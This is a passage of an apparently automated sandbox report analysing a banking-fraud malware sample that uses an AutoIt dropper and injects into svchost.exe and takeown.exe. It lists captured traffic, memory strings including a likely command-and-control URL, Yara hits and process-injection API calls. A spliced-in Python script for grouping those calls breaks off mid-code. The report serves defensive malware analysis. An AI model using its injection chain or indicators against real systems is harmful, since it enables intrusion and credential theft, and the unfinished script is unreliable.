3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:03:30 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 01:03:32 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Tue, 11 Mar 2025 01:03:38 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Tue, 11 Mar 2025 01:03:41 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Tue, 11 Mar 2025 01:03:44 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Tue, 11 Mar 2025 01:03:46 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Tue, 11 Mar 2025 01:03:52 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Tue, 11 Mar 2025 01:03:55 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330168283.0000000000E37000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kakeksakti43.cfd
                Source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330168283.0000000000E37000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kakeksakti43.cfd/37iq/
                Source: takeown.exe, 00000003.00000002.3330925884.0000000003AD6000.00000004.10000000.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330637101.0000000002CD6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.nan21.ro
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: takeown.exe, 00000003.00000002.3330925884.000000000411E000.00000004.10000000.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330637101.000000000331E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: takeown.exe, 00000003.00000002.3330925884.000000000411E000.00000004.10000000.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330637101.000000000331E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
                Source: takeown.exe, 00000003.00000002.3328687494.0000000002A34000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: takeown.exe, 00000003.00000002.3328687494.0000000002A34000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: takeown.exe, 00000003.00000002.3328687494.0000000002A0C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: takeown.exe, 00000003.00000002.3328687494.0000000002A34000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: takeown.exe, 00000003.00000002.3328687494.0000000002A0C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: takeown.exe, 00000003.00000003.1245230967.00000000076CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00384164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00384164
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00383F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00383F66
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0037001C
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0039CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0039CABC

                E-Banking Fraud

                Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.3330191796.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3330168283.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1066377922.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3328376409.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1066813135.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.3330359905.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1066016609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3330036627.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: This is a third-party compiled AutoIt script.0_2_00313B3A
                Source: IBbGrGi4A7.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: IBbGrGi4A7.exe, 00000000.00000000.856981789.00000000003C4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_dc2873f2-3
                Source: IBbGrGi4A7.exe, 00000000.00000000.856981789.00000000003C4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_55f36ba6-4
                Source: IBbGrGi4A7.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7bb4fb55-4
                Source: IBbGrGi4A7.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e5a12019-d
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C253 NtClose,1_2_0042C253
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772B60 NtClose,LdrInitializeThunk,1_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037735C0 NtCreateMutant,LdrInitializeThunk,1_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03774340 NtSetContextThread,1_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03774650 NtSuspendThread,1_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BF0 NtAllocateVirtualMemory,1_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BE0 NtQueryValueKey,1_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BA0 NtEnumerateValueKey,1_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772B80 NtQueryInformationFile,1_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772AF0 NtWriteFile,1_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772AD0 NtReadFile,1_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772F30 NtCreateSection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772FE0 NtCreateFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772FB0 NtResumeThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772EE0 NtQueueApcThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772E80 NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772D30 NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772D10 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772DD0 NtDelayExecution
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772C70 NtFreeVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772C60 NtCreateKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772CA0 NtQueryInformationToken
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03773010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03773090 NtSetValueKey
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037739B0 NtGetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03773D70 NtOpenThread
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03773D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA4340 NtSetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA4650 NtSuspendThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2AF0 NtWriteFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2AD0 NtReadFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2BE0 NtQueryValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2BA0 NtEnumerateValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2EE0 NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2E80 NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2FE0 NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2FB0 NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2F30 NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2CA0 NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2C60 NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2DD0 NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2D30 NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2D10 NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA35C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA39B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA2D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA3090 NtSetValueKey
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA3010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA3D70 NtOpenThread
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02FA3D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02598F60 NtCreateFile
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_02599260 NtClose
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_025993C0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_025990D0 NtReadFile
                Source: C:\Windows\SysWOW64\takeown.exe Code function: 3_2_025991C0 NtDeleteFile
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe Code function: 0_2_0037A1EF GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe Code function: 0_2_00368310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe Code function: 0_2_003751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
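The listing above records, per process, which Nt* stubs the sandbox found in code and at what address, but it does not say which of them together form the process-injection chain behind the report's thread-injection and foreign-memory-write signatures. The Python script below is an added example (it is not part of the Joe Sandbox report and not FormBook code) that parses lines in exactly the format shown, tolerating the fused "exeCode function" and the duplicated trailing address that the page extractor produced, and groups each process's stubs into injection stages. The stage model (open target, place memory, write payload, run payload) and the choice of sample lines are this example's own assumptions; the sample lines themselves are copied from the listing. One caveat a reader should keep in mind: the Win32 chains attributed to IBbGrGi4A7.exe (LoadUserProfileW/CreateEnvironmentBlock/CreateProcessAsUserW, ExitWindowsEx/InitiateSystemShutdownExW/SetSystemPowerState) are consistent with the AutoIt runtime's built-in RunAs and Shutdown functions, which the report's "compiled AutoIt script" finding would explain, so they should not by themselves be read as FormBook-specific capability.

```python
"""Group the Nt* stubs a Joe Sandbox "Code function" listing attributes to each
process and report which processes carry a full process-injection chain.

Added example; not part of the sandbox report. The stage mapping below is this
example's own assumption about which native calls make up an injection chain.
"""
import re
from collections import defaultdict

# Constructed sample: a handful of lines copied from the report listing, kept
# exactly as the page extractor rendered them (".exe" fused with "Code
# function", and the function address repeated at the end as link text).
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772F30 NtCreateSection,1_2_03772F30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772FB0 NtResumeThread,1_2_03772FB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772E30 NtWriteVirtualMemory,1_2_03772E30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772EE0 NtQueueApcThread,1_2_03772EE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772D10 NtMapViewOfSection,1_2_03772D10
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772CF0 NtOpenProcess,1_2_03772CF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772DD0 NtDelayExecution,1_2_03772DD0
Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA4340 NtSetContextThread,LdrInitializeThunk,3_2_02FA4340
Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_02FA2BF0
Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2E30 NtWriteVirtualMemory,3_2_02FA2E30
Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2CF0 NtOpenProcess,3_2_02FA2CF0
Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2AB0 NtWaitForSingleObject,3_2_02FA2AB0
Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003751BD
Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0031E6A00_2_0031E6A0
"""

LINE_RE = re.compile(
    r"Source:\s*(?P<path>.+?\.exe)\s*Code function:\s*"
    r"(?P<addr>\d+_\d+_[0-9A-Fa-f]{8})\s*(?P<rest>.*)$"
)
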